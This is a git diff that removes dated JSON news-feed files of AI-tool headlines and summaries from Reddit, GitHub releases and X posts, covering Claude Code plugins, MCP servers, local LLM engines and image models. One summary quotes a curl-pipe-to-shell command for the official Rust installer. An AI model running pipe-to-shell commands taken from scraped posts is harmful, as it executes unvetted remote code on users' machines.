🔗 [https://github.com/kigy1/EasyUI]", - "category": "creative_tools" - }, - { - "title": "Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community", - "url": "https://x.com/Shaughnessy119/status/2042339593647800404", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-03T14:53:59.070Z", - "summary": "Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability.", - "category": "ai_tools" - }, - { - "title": "Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-03T12:54:04.000Z", - "summary": "\\--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \\--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. 
Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think.", - "category": "creative_tools" - }, - { - "title": "OpenClaw v2026.5.2 released", - "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.5.2", - "source": "GitHub Releases · OpenClaw", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.91, - "date": "2026-05-02T23:37:55.000Z", - "summary": "\n### Highlights\n\n- External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.\n- Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.\n- Control UI and WebChat are more resilient across ", - "category": "ai_tools" - }, - { - "title": "pnpm v11.0.4 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.4", - "source": "GitHub Releases · pnpm", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-05-02T23:32:37.000Z", - "summary": "## Patch Changes\r\n\r\n* Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427).\r\n* Remove pnpm's workspace state file when cleaning node\\_modules so `pnpm ci` performs a fresh install after the clean step.\r\n* Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. 
The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`.", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.8 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.8", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.7, - "date": "2026-05-03T02:41:00.000Z", - "summary": "\n\n## What's Changed\n### @turbo/repository\n* chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636\n### Changelog\n* release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679\n* test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681\n* docs: Clarify root task guidance by @anthon", - "category": "ai_tools" - }, - { - "title": "Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31", - "url": "https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory", - "source": "Hugging Face Blog", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T18:00:42.827Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "Built this over the weekend because dataset prep was annoying af", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T17:50:27.000Z", - "summary": "I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. 
You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. You’ll…", - "category": "creative_tools" - }, - { - "title": "I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T17:40:48.000Z", - "summary": "soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people 
who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\\\\"Zen Mode\\\\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442…", - "category": "creative_tools" - }, - { - "title": "Can I ask a noob question?", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T17:21:05.000Z", - "summary": "Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you.", - "category": "creative_tools" - }, - { - "title": "Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-03T14:54:30.000Z", - "summary": "Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. 
It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\\_K\\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\\_K\\_M: 134 tok/s decode (llama.cpp does \\~129) * Mistral-7B: 132 tok/s (llama.cpp \\~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup.", - "category": "creative_tools" - }, - { - "title": "Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-03T14:52:46.000Z", - "summary": "Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). Completely amateur — no benchmarking rigor, just curiosity and a free weekend. 
# Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**…", - "category": "creative_tools" - }, - { - "title": "@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged", - "url": "https://x.com/Scobleizer/status/2050740859789103142", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-03T14:52:14.377Z", - "summary": "Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. 
The response provides a concise overview of his information infrastructure and editorial brand.", - "category": "ai_tools" - }, - { - "title": "What if ChatGPT launched in 1998", - "url": "https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/", - "source": "Reddit r/ChatGPT", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-03T13:16:47.000Z", - "summary": "Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️", - "category": "ai_tools" - }, - { - "title": "Set up multi-agent orchestration with Claude Code as the boss... am I overcomplicating this?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-03T10:49:45.000Z", - "summary": "Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for \"review your own diff with fresh eyes\" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . 
Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. Because with work I have the two accoun…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-04.json b/data/news-feed-2026-05-04.json deleted file mode 100644 index d34c400..0000000 --- a/data/news-feed-2026-05-04.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.711Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-04", - "article_count": 15, - "archived_story_count": 617, - "articles": [ - { - "title": "Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-04T14:33:50.000Z", - "summary": "A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to \"what would break if I delete this function.\" We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. 
**Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. (Disclosure: I am part of the team behind it…", - "category": "ai_tools" - }, - { - "title": "claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config", - "url": "https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-04T05:19:34.000Z", - "summary": "Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into \"rewrite all the plugins\" or \"do without.\" claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \\`claude\\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \\`claude\\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \\~90%, and handles the per-provider env-var differences for you. 
Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over…", - "category": "ai_tools" - }, - { - "title": "Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-04T19:28:17.000Z", - "summary": "https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. 
Installation happens in one line now From a fresh computer to talking with a DAAF-e…", - "category": "ai_tools" - }, - { - "title": "Top 6 Claude Skills: 15th April to 3rd May", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-04T18:42:21.000Z", - "summary": "Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. 
Comes straight from the book 'The minimalist Entrepreneur\" playbook cost-based, value-bas…", - "category": "ai_tools" - }, - { - "title": "built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T17:38:22.000Z", - "summary": "I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking \"wait, what shape did the user object end up as?\", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. Works for broadcasts too, like \"ask everyone what they're working on\", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I…", - "category": "ai_tools" - }, - { - "title": "Your Claude Code agent is always working from stale context. 
I built it a fix it can rewind, replay, and stay ahead of every edit.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 0.99, - "date": "2026-05-04T10:33:23.000Z", - "summary": "Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to \"remind itself\" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking \"what does getUserById return?\" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. Your codebase is stored bi-temporally so every change becomes a recallable episode. 
When the agent debugs a r…", - "category": "ai_tools" - }, - { - "title": "ChatGPT’s fixation on my past conversations has made it borderline unusable", - "url": "https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/", - "source": "Reddit r/ChatGPT", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.96, - "date": "2026-05-04T03:07:30.000Z", - "summary": "in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. 
its like a new version of the “people pleasing“ that we were all griping about…", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.9 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.9", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-05-04T20:55:20.000Z", - "summary": "\n\n## What's Changed\n### Changelog\n* release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700\n* fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699\n* release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705\n* fix: Scope repo index prefixes to Git root by @anthonyshew", - "category": "ai_tools" - }, - { - "title": "pnpm v11.0.5 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.5", - "source": "GitHub Releases · pnpm", - "tags": [ - "github_release", - "cli_tool" - ], - "matching_tags": [ - "github_release", - "cli_tool" - ], - "importance": 0.9199999999999999, - "date": "2026-05-04T20:22:16.000Z", - "summary": "## Patch Changes\r\n\r\n* Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS ", - "category": "ai_tools" - }, - { - "title": "A new open weights image model appears in ArtificialAnalysis. 
Outperforming Flux.2 Pro and Z Image Turbo.", - "url": "https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-04T19:07:33.000Z", - "summary": "A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.", - "category": "creative_tools" - }, - { - "title": "Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live", - "url": "https://x.com/peaq/status/2051288009081782473", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-04T14:56:47.726Z", - "summary": "peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore.", - "category": "ai_tools" - }, - { - "title": "AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures", - "url": "https://x.com/WesRoth/status/2051300819878936591", - "source": "Aligned News (Scoble)", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T14:56:47.725Z", - "summary": "An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. 
It was the discovery.", - "category": "ai_tools" - }, - { - "title": "Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor", - "url": "https://x.com/ericzakariasson/status/2051255780167610522", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-04T14:56:47.725Z", - "summary": "The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness.", - "category": "ai_tools" - }, - { - "title": "Ace-Step-1.5-Api-server-UI", - "url": "https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-04T06:10:23.000Z", - "summary": "[Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support", - "category": "creative_tools" - }, - { - "title": "Meta Abandons Open Source — Days After LlamaCon", - "url": "https://x.com/thenewstack/status/2050017453615301067", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - 
"importance": 1, - "date": "2026-05-03T23:53:43.957Z", - "summary": "Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-05.json b/data/news-feed-2026-05-05.json deleted file mode 100644 index 2ac0f3f..0000000 --- a/data/news-feed-2026-05-05.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.852Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-05", - "article_count": 15, - "archived_story_count": 540, - "articles": [ - { - "title": "torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-03T22:43:17.000Z", - "summary": "I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \\~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. 
**Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — \"Video Codecs are Secretly Tensor Codecs\"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The \"video codec on tensors\" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\\~4× compression floor, basically the Gaussian-noise limit). The PCA basis…", - "category": "ai_research" - }, - { - "title": "Released a TurboQuant-compatible KV backend evaluation SDK", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T17:12:04.000Z", - "summary": "Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. 
